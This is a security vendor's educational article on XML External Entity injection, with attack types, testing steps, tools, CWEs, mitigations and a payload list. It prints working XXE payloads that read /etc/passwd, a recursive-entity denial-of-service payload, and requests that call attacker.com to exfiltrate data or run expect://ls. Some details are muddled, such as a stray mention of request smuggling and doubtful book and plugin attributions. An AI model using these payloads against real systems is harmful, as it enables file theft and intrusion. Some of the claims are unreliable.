17 Feb, 2023

XML External Entity Injection

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

The abbreviation for External Entity Injection is XXE, which stands for “XML External Entity” Injection.

XML External Entity (XXE) Injection is a type of security vulnerability that can occur in applications that parse XML input. XML is a markup language used for storing and transporting data, and is commonly used in web applications to exchange data between the server and client. XXE Injection occurs when an attacker is able to inject a malicious XML document into an application’s parser, allowing them to access sensitive data, execute remote code, or cause a denial-of-service attack.

The vulnerability arises when the application does not properly validate or sanitize user input before parsing it as XML. In an XXE attack, an attacker may be able to define external entities in the malicious XML document, which can be used to read files on the server or access resources on the network. By exploiting this vulnerability, attackers can steal sensitive information, execute arbitrary code on the server, or cause the application to crash.

XXE Injection attacks can occur in various contexts, including web applications, SOAP and REST APIs, and other applications that rely on XML data.

Types of External Entity Injections

There are several types of External Entity Injection (XXE) attacks that have been identified by security researchers. Here is a list of some of the most common XXE Injection techniques:

  1. In-band XXE Injection – In this type of attack, the attacker sends a malicious XML document to the application, and receives the results of the attack back in-band in the application’s response.

  2. Out-of-band (OOB) XXE Injection – In this type of attack, the attacker sends a malicious XML document to the application, and then uses a separate out-of-band channel to receive the results of the attack.

  3. Blind XXE Injection – In this type of attack, the attacker sends a malicious XML document to the application, but does not receive any feedback from the application. Instead, the attacker must use another technique to determine if the attack was successful.

  4. Parameter Entity Injection – In this type of attack, the attacker exploits a vulnerability in the way the application handles parameter entities in the DTD (Document Type Definition) to execute the XXE attack.

  5. External DTD Entity Injection – In this type of attack, the attacker injects a malicious DTD that includes external entities, which can be used to read files on the server or access network resources.

  6. SVG Entity Injection – In this type of attack, the attacker injects malicious code into an SVG image that is processed by the application, and then uses an XXE Injection to execute the code.

  7. SOAP with Attachments (SwA) Injection – In this type of attack, the attacker uses a vulnerability in the way SOAP messages with attachments are processed to execute the XXE attack.

Examples of different requests that can be used to test for External Entity Injections

Basic XXE request:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>&xxe;</test>
				
			

n this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes a parameter entity called “xxe” that reads the contents of the /etc/passwd file using the SYSTEM keyword.

Out-of-band XXE request:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">
  %xxe;
]>
				
			

In this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes a parameter entity called “xxe” that points to an external DTD file hosted on the attacker’s domain. The attacker can then monitor the logs on their server to see if the XXE attack was successful.

Blind XXE request:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "http://attacker.com/xxe.dtd">
]>
<test>&xxe;</test>
				
			

In this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes a parameter entity called “xxe” that points to an external DTD file hosted on the attacker’s domain. However, since the application does not provide any feedback in the response, the attacker must use another method to determine if the XXE attack was successful.

Parameter Entity Injection:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % ext SYSTEM "http://attacker.com/external.dtd">
  %ext;
]>
<message>&payload;</message>
				
			

In this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes a parameter entity called “ext” that points to an external DTD file hosted on the attacker’s domain. The attacker can use the external DTD file to define additional entities, such as “payload”, which can be used to execute the XXE attack.

Out-of-band (OOB) XXE Injection:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % ext SYSTEM "http://attacker.com/external.dtd">
  <!ENTITY % data SYSTEM "file:///dev/random" >
  <!ENTITY % oob SYSTEM "http://attacker.com/?%data;">
  %ext;
]>
<message>&payload;</message>
				
			

In this example, the attacker is using an out-of-band channel to receive the results of the XXE attack. The XML payload includes a parameter entity called “ext” that points to an external DTD file hosted on the attacker’s domain. The DTD file includes additional entities, such as “data” and “oob”, that can be used to read data from the server and send it to the attacker’s domain.

SOAP with Attachments (SwA) Injection:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: multipart/related; boundary="boundary"

--boundary
Content-Type: text/xml; charset=utf-8
Content-Transfer-Encoding: 8bit

<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % ext SYSTEM "http://attacker.com/external.dtd">
  %ext;
]>
<message>&payload;</message>

--boundary
Content-Type: application/octet-stream
Content-Transfer-Encoding:

				
			

In this example, external DTD file hosted on the attacker’s domain. The DTD file includes additional entities, such as “payload”, that can be used to execute the XXE attack. The attack payload is included as an attachment to the request.

It is important to note that these attacks are just the tip of the iceberg and there are many variations and combinations of attacks that can be used to exploit XXE vulnerabilities.

Examples of External Entity Injections exploitation

Retrieving sensitive data:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<message>&file;</message>
				
			

In this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes an entity called “file” that reads the contents of the /etc/passwd file using the SYSTEM keyword.

Remote code execution:

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY command "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?%data;'>">
  <!ENTITY data SYSTEM 'expect://ls'>
  %command;
]>
<message>&send;</message>
				
			

In this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes an entity called “command” that injects an entity called “send” that sends the output of the “ls” command to the attacker’s domain.

Denial of Service (DoS):

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % entity1 "<!ENTITY &#x25; entity2 '&#x26;#x25; entity2;&#x25; entity2;'>">
  %entity1;
]>
<message>&entity2;</message>
				
			

In this example, the attacker is sending a POST request to a test.php file on the example.com domain. The XML payload includes an entity called “entity1” that injects an entity called “entity2” that references itself, causing an infinite loop and consuming excessive resources on the server, leading to a DoS.

These are just a few examples of External Entity Injection exploitation requests. It is important to note that these attacks are for educational purposes only, and it is illegal to use them without permission from the target system’s owner.

Privilege escalation techniques External Entity Injections

Privilege escalation techniques for External Entity Injection (XXE) attacks typically involve using the vulnerability to bypass access controls or gain elevated privileges on the target system.

  1. Retrieving sensitive data for lateral movement: An attacker may use an XXE vulnerability to retrieve sensitive data, such as credentials or configuration files, that can be used to move laterally within the target network. For example, the attacker could inject an entity that reads the contents of a sensitive file and sends it to a remote server controlled by the attacker.

  2. Exploiting trust relationships: In some cases, an attacker can use an XXE vulnerability to exploit trust relationships between different systems. For example, an attacker may inject an entity that references an external DTD hosted on a trusted domain, such as a vendor or partner site. The trusted site may be used to execute the attack payload, allowing the attacker to bypass access controls on the target system.

  3. Exploiting complex XML data structures: Some XML data structures may be complex and difficult to parse, which can create opportunities for privilege escalation. For example, an attacker may use an XXE vulnerability to inject an entity that modifies the XML document’s internal DTD subset, which can change the document’s structure and allow the attacker to access restricted parts of the system.

  4. Attacking XML parsers: In some cases, an attacker can use an XXE vulnerability to exploit vulnerabilities in the XML parser itself. For example, the attacker may use an entity that triggers a buffer overflow or memory corruption vulnerability in the parser, allowing the attacker to execute arbitrary code with elevated privileges.

General methodology and checklist for testing External Entity Injections

  1. Identify input fields that accept XML data: The first step in testing for XXE vulnerabilities is to identify any input fields that accept XML data, such as SOAP or REST APIs that accept XML payloads, or web applications that accept XML data in input fields.

  2. Attempt to inject a simple external entity: The next step is to attempt to inject a simple external entity, such as a file inclusion payload that reads a file from the local file system. If the application processes the entity and returns the contents of the file, it may be vulnerable to XXE.

  3. Attempt to inject more complex payloads: If the simple payload is not successful, attempt to inject more complex payloads that use nested entities or reference external DTDs. The goal is to identify specific types of XML parsers or XML data structures that are vulnerable to XXE attacks.

  4. Test for blind XXE vulnerabilities: In some cases, XXE vulnerabilities may be “blind,” meaning that the application does not return any error messages or other indications that the payload was successful. To test for blind XXE vulnerabilities, inject a payload that sends a request to an external server controlled by the tester, such as a remote image file or a DNS lookup. If the server receives the request, it indicates that the payload was successful.

  5. Test for input validation and sanitization: Check whether the application validates and sanitizes input data. If the application does not validate or sanitize input data, it may be possible to bypass security controls and execute XXE payloads.

  6. Check for protection against XXE: Many frameworks and libraries provide protection against XXE vulnerabilities, such as the use of secure XML parsers or configuration settings that prevent the resolution of external entities. Check whether the application has implemented such protections and whether they are effective.

  7. Document and report the vulnerability: If a vulnerability is identified, document the details of the exploit and provide a clear explanation of the impact and potential risk to the organization. Report the vulnerability to the relevant stakeholders, such as the development team or security team, and provide clear steps for remediation.

This is a general methodology and checklist for testing XXE vulnerabilities. It is important to note that specific testing methods and steps may vary depending on the target system’s architecture and the specific context of the vulnerability.

Tools set for exploiting External Entity Injections

Manual tools:

  1. Burp Suite: Burp Suite is a popular tool for web application security testing, including XXE testing. It provides a range of features to manually test for XXE vulnerabilities, such as the ability to modify XML payloads and send them to the target application.

  2. OWASP ZAP: OWASP ZAP is another popular tool for web application security testing. It includes features to manually test for XXE vulnerabilities, such as the ability to modify requests and responses and analyze XML data.

  3. SoapUI: SoapUI is a testing tool specifically designed for testing SOAP and REST APIs. It includes features to manually test for XXE vulnerabilities, such as the ability to modify XML payloads and analyze responses.

  4. XML External Entity Injection Exploiter: This is a manual tool designed specifically for testing XXE vulnerabilities. It allows the tester to modify XML payloads and analyze responses for indications of XXE vulnerabilities.

  5. XXE Payloads: This is a collection of XXE payloads and DTDs that can be used to manually test for XXE vulnerabilities.

Automated tools:

  1. Nessus: Nessus is a popular vulnerability scanner that includes modules to automatically test for XXE vulnerabilities. It can scan web applications and APIs for XXE vulnerabilities and provide a report of any findings.

  2. Acunetix: Acunetix is another popular web application scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  3. AppScan: AppScan is a web application scanner developed by HCL Technologies that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  4. Netsparker: Netsparker is a web application scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  5. WebInspect: WebInspect is a web application scanner developed by Micro Focus that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  6. Skipfish: Skipfish is a web application scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  7. Arachni: Arachni is an open-source web application scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  8. Vega: Vega is an open-source web application scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  9. Nikto: Nikto is an open-source web server scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

  10. Qualys: Qualys is a cloud-based vulnerability scanner that includes features to automatically test for XXE vulnerabilities. It can identify XXE vulnerabilities and provide guidance on remediation.

Browser plugins:

  1. XXEinjector: XXEinjector is a browser plugin designed to test for XXE vulnerabilities. It allows the user to modify XML payloads and send them to the target application.

  2. XxeProbe: XxeProbe is another browser plugin designed to test for XXE vulnerabilities. It can analyze responses for indications of XXE vulnerabilities and provide guidance on remediation.

Testing frameworks:

  1. OWASP Web Security Testing Guide: The OWASP Web Security Testing Guide is a framework for testing web applications for security vulnerabilities, including XXE vulnerabilities. It provides guidance on manual and automated testing methods and techniques.

  2. NIST SP 800-53: is a framework for information security controls, including controls for web applications. It includes guidance on testing web applications for XXE vulnerabilities and other security issues.

  3. PTES: The Penetration Testing Execution Standard (PTES) is a framework for conducting penetration testing, including web application testing. It includes guidance on testing for XXE vulnerabilities and other security issues.

  4. OSSTMM: The Open Source Security Testing Methodology Manual (OSSTMM) is a framework for security testing, including web application testing. It includes guidance on testing for XXE vulnerabilities and other security issues.

  5. OASIS: The Organization for the Advancement of Structured Information Standards (OASIS) is a standards organization that has developed a number of XML-related standards, including XML schemas and DTDs. These standards can be used to test for XXE vulnerabilities.

    Overall, when testing for External Entity Injection vulnerabilities, it is important to use a combination of manual and automated tools and techniques to ensure thorough testing. This may include modifying XML payloads, analyzing responses, and using a variety of different tools to identify vulnerabilities.

Average CVSS score of External Entity Injections

It is difficult to provide an average CVSS score for External Entity Injection (XXE) vulnerabilities because the severity of each vulnerability can vary widely depending on the specific implementation and the potential impact on the affected system.

The Common Vulnerability Scoring System (CVSS) is a standard method for assessing the severity of security vulnerabilities. The CVSS score is calculated based on several factors, including the impact of the vulnerability and the ease of exploitation. The resulting score ranges from 0 to 10, with a higher score indicating a more severe vulnerability.

In the case of XXE vulnerabilities, the impact and ease of exploitation can vary widely. For example, an XXE vulnerability that allows an attacker to retrieve sensitive data from the server could be considered very severe and could receive a high CVSS score. On the other hand, an XXE vulnerability that only allows an attacker to retrieve a limited amount of information or requires a high level of skill to exploit may receive a lower CVSS score.

In general, XXE vulnerabilities are considered to be serious security issues that can potentially result in data leakage, denial of service, or remote code execution. As such, it is important to address these vulnerabilities as soon as they are discovered in order to prevent exploitation by attackers. It is recommended to evaluate the impact and exploitability of each specific XXE vulnerability, and use the resulting CVSS score as a guidance to prioritize remediation actions.

The Common Weakness Enumeration (CWE) for External Entity Injections

  1. CWE-611: Improper Restriction of XML External Entity Reference: This weakness occurs when an application processes XML input without properly restricting the entity references in the input, which can allow attackers to read or write arbitrary files, retrieve sensitive data, or execute arbitrary code.

  2. CWE-78: Improper Neutralization of Special Elements used in an OS Command: This weakness occurs when an application does not properly sanitize user input that is used in an operating system command, which can allow attackers to execute arbitrary commands on the server.

  3. CWE-200: Information Exposure: This weakness occurs when an application unintentionally exposes sensitive information to an attacker. In the case of XXE vulnerabilities, this may occur if the attacker is able to retrieve sensitive information from the server.

  4. CWE-400: Uncontrolled Resource Consumption: This weakness occurs when an application does not properly restrict the resources that can be consumed by an attacker. In the case of XXE vulnerabilities, this may occur if the attacker is able to cause the server to consume excessive resources, leading to a denial of service.

  5. CWE-502: Deserialization of Untrusted Data: This weakness occurs when an application deserializes data that has been provided by an untrusted source, which can allow attackers to execute arbitrary code on the server.

  6. CWE-601: URL Redirection to Untrusted Site: This weakness occurs when an application allows a user to be redirected to an untrusted site. In the case of XXE vulnerabilities, this may occur if the attacker is able to redirect the user to a site that is under the attacker’s control.

  7. CWE-732: Incorrect Permission Assignment for Critical Resource: This weakness occurs when an application does not properly assign permissions to critical resources, which can allow attackers to access or modify those resources.

  8. CWE-862: Missing Authorization: This weakness occurs when an application does not properly enforce access controls, which can allow attackers to access resources or perform actions that they should not be able to.

  9. CWE-863: Incorrect Authorization: This weakness occurs when an application enforces access controls incorrectly, which can allow attackers to access resources or perform actions that they should not be able to.

Latests CVEs related to External Entity Injections

CVE-2022-0217 – It was discovered that an internal Prosody library to load XML based on libexpat does not properly restrict the XML features allowed in parsed XML data. Given suitable attacker input, this results in expansion of recursive entity references from DTDs (CWE-776). In addition, depending on the libexpat version used, it may also allow injections using XML External Entity References (CWE-611).

The list of CVEs is constantly being updated and full an up-to-date list of all existed Common Vulnerabilities and Exposures (CVEs) for HTTP Request Smuggling vulnerabilities can be found at official CVE website https://cve.mitre.org/

List of popular exploits related to External Entity Injections

There are several popular exploits related to External Entity Injection (XXE) vulnerabilities, and they can have a wide range of impact depending on the specific implementation and the vulnerability’s severity. Here are some common XXE exploits:

  1. Remote Code Execution (RCE): An XXE vulnerability can allow an attacker to execute arbitrary code on the server. This can be achieved by injecting a malicious XML entity that includes executable code, which can then be parsed and executed by the server.

  2. Denial of Service (DoS): An attacker can use an XXE vulnerability to cause the server to consume excessive resources, leading to a denial of service. This can be achieved by injecting an XML entity that causes the server to enter an infinite loop, or by injecting a large number of entities that cause the server to consume a large amount of memory.

  3. File Disclosure: An XXE vulnerability can allow an attacker to retrieve sensitive files from the server. This can be achieved by injecting an XML entity that includes a reference to a sensitive file, which can then be parsed and returned to the attacker.

  4. SSRF (Server-Side Request Forgery): An attacker can use an XXE vulnerability to perform server-side requests to other internal systems, which can allow the attacker to retrieve sensitive information or execute arbitrary code on those systems. This can be achieved by injecting an XML entity that includes a reference to an internal system, which can then be used to make requests to that system.

  5. XML Signature Wrapping: This is a specific type of XXE exploit that involves manipulating the XML signature used for digital signatures in XML documents. By manipulating the signature, an attacker can include arbitrary XML entities that can be parsed and executed by the server, which can lead to remote code execution or other types of attacks.

  6. XXE via SOAP and REST APIs: An attacker can exploit XXE vulnerabilities in SOAP and REST APIs to retrieve sensitive information or execute arbitrary code on the server. This can be achieved by injecting malicious XML entities into SOAP or REST requests, which can then be parsed and executed by the server.

  7. Blind XXE: In some cases, an XXE vulnerability may not return any output to the attacker, making it more difficult to detect and exploit. Blind XXE attacks involve injecting an XML entity that triggers a specific response from the server, such as a change in a database record or a change in the timing of a response, which can be used to infer sensitive information or execute arbitrary code.

Practice identifying and exploiting External Entity Injections

There are several resources and tools available that can help you get started.

Here are a few recommendations:

  1. Vulnerable Web Applications: There are several intentionally vulnerable web applications that include XXE vulnerabilities as part of their design. These applications are a great way to practice exploiting XXE vulnerabilities and learn more about the different types of XXE exploits. Some examples of vulnerable web applications include OWASP WebGoat and Mutillidae.

  2. Capture the Flag (CTF) Challenges: CTF challenges are competitions where participants try to solve a series of security challenges, including XXE vulnerabilities. These challenges can be a great way to practice and improve your skills in a competitive environment. There are several online CTF platforms, such as HackTheBox and TryHackMe, that offer XXE challenges.

  3. Penetration Testing Tools: There are several penetration testing tools that can help you identify and exploit XXE vulnerabilities, such as Burp Suite and OWASP ZAP. These tools can be used to scan for XXE vulnerabilities and test different types of XXE exploits.

  4. Online Tutorials and Courses: There are several online tutorials and courses that can help you learn about XXE vulnerabilities and how to exploit them. Some examples include the “XXE Injection” module on the PortSwigger Web Security Academy, and the “XML External Entity Injection” module on the OWASP Top 10 Project.

  5. Practicing on Real-World Applications: Finally, one of the best ways to learn about XXE vulnerabilities is to practice on real-world applications. This can be done by setting up a testing environment and intentionally introducing XXE vulnerabilities, or by participating in bug bounty programs or vulnerability disclosure programs. It’s important to note that you should only attempt to exploit vulnerabilities on systems that you have explicit permission to test.

Books with review of External Entity Injections

  1. “Web Application Security: A Beginner’s Guide” by Bryan Sullivan and Vincent Liu: This book covers a broad range of web application security topics, including XXE vulnerabilities, in a beginner-friendly way. It provides practical advice on identifying and mitigating security risks in web applications.

  2. “The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws” by Dafydd Stuttard and Marcus Pinto: This book is a comprehensive guide to web application security and includes detailed coverage of XXE vulnerabilities. It provides step-by-step instructions on how to identify, exploit, and remediate XXE vulnerabilities in web applications.

  3. “XML and JSON Recipes for SQL Server: A Problem-Solution Approach” by Alex Grinberg: This book focuses on XML and JSON processing in SQL Server, but includes a section on XXE vulnerabilities and how to mitigate them. It provides practical advice on how to write secure code for XML and JSON processing in SQL Server.

  4. “The Art of Hacking” by Jon Erickson: This book is a hands-on guide to hacking and includes a section on XML external entity injection. It provides detailed instructions on how to identify and exploit XXE vulnerabilities in web applications.

  5. “Mastering Modern Web Penetration Testing” by Prakhar Prasad: This book is a practical guide to web penetration testing and includes a section on XXE vulnerabilities. It provides step-by-step instructions on how to identify and exploit XXE vulnerabilities in web applications using tools like Burp Suite.

  6. “Black Hat Python: Python Programming for Hackers and Pentesters” by Justin Seitz: This book is focused on using Python for hacking and includes a section on XXE vulnerabilities. It provides practical advice on how to write Python scripts to identify and exploit XXE vulnerabilities in web applications.

List of payloads for External Entity Injections

  1. ‘<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>’
    This payload defines an external entity named “xxe” that references the local file system to read the contents of the “/etc/passwd” file.

  2. ‘<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “http://attacker.com/xxe”> ]>’
    This payload defines an external entity named “xxe” that references an attacker-controlled web server to retrieve arbitrary data or execute arbitrary commands.

  3. ‘<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM “file:///etc/passwd”> %xxe; ]>’
    This payload defines an external parameter entity named “xxe” that references the local file system to read the contents of the “/etc/passwd” file.

  4. ‘<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM “http://attacker.com/xxe”> %xxe; ]>’
    This payload defines an external parameter entity named “xxe” that references an attacker-controlled web server to retrieve arbitrary data or execute arbitrary commands.

  5. ‘<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “php://filter/read=convert.base64-encode/resource=index.php”> ]>’ This payload defines an external entity named “xxe” that uses the PHP filter to read the contents of a file and encode it in Base64 format.

  6. ‘<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “php://input”> ]>’
    This payload defines an external entity named “xxe” that reads the contents of the request body, which can be used to pass arbitrary data or commands to the server.

  7. ‘<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “data:text/plain;base64,PHNjcmlwdD5hbGVydCgxMjM0KTwvc2NyaXB0Pg==”> ]>’
    This payload defines an external entity named “xxe” that contains base64-encoded data, which can be used to execute arbitrary JavaScript code in the browser.

Mitigation and how to be protected from External Entity Injections

Here are some ways to mitigate and protect against External Entity Injection attacks:

  1. Input validation: Validate and sanitize all user input to ensure that it is in the expected format and does not contain any malicious data. This includes input from all sources, such as forms, cookies, and headers.

  2. Use whitelisting: Whitelist valid input values and discard any input that does not match the expected format. This can prevent the injection of malicious code or entities.

  3. Avoid using XML parsers that support external entities: Use XML parsers that do not support external entities, or disable external entities in the parser configuration. This can prevent malicious entities from being parsed and executed.

  4. Use parameterized queries: Use parameterized queries instead of string concatenation to construct database queries. This can prevent SQL injection attacks, which can be used in conjunction with External Entity Injection attacks to escalate privileges and execute arbitrary code.

  5. Use server-side input validation and output encoding: Use server-side input validation to validate and sanitize all user input, and output encoding to prevent the injection of malicious code or entities into the response.

  6. Keep software up to date: Keep all software and dependencies up to date with the latest security patches and updates. This can prevent known vulnerabilities from being exploited.

  7. Implement access controls: Implement access controls to restrict access to sensitive resources and functionality. This can limit the impact of an External Entity Injection attack and prevent unauthorized access to critical data.

By following these best practices, you can significantly reduce the risk of External Entity Injection attacks and protect your applications and data from malicious actors.

Conclusion

External Entity Injection is a type of security vulnerability that allows an attacker to inject malicious code or entities into an XML or SOAP request. This can be used to steal sensitive data, escalate privileges, and execute arbitrary code. To protect against External Entity Injection, it is important to follow best practices such as input validation, parameterized queries, and server-side input validation and output encoding. By taking these steps, organizations can significantly reduce the risk of External Entity Injection attacks and protect their applications and data from malicious actors.

Other Services

Ready to secure?

Let's get in touch